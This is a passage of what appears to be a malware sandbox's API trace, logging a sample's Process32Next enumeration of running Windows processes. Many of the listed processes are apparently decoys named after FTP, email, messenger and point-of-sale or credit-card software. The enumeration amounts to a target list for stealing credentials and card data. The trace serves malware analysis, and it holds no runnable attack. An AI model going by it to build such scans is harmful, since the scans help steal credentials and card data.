| out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.400] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.401] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.403] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.408] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.410] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.412] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.414] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.417] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.423] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.426] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.428] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.430] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.433] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.464] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.466] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.468] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.469] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.471] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.472] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0247.474] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0247.478] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.480] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.481] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0247.483] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0247.485] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0247.487] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.489] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.490] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0247.492] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.493] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.495] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0247.497] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0247.502] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0247.504] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0247.506] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0247.508] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0247.511] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0247.726] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0247.729] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0247.734] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0247.737] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0247.739] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0247.741] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0247.743] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0247.745] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0247.752] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0247.754] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0247.756] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.758] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.761] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.766] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.768] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.770] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.772] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.774] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.776] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0248.018] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0248.020] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0248.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0248.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0248.025] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0248.027] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0248.029] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0248.031] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0248.033] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0248.034] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0248.036] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0248.038] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0248.039] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0248.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0248.043] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0248.045] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0248.046] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0248.048] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0248.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0248.052] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0248.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0248.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0248.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0248.058] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0248.148] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0248.150] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0248.155] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0248.158] Process32Next (in: hSnapshot=0x758, 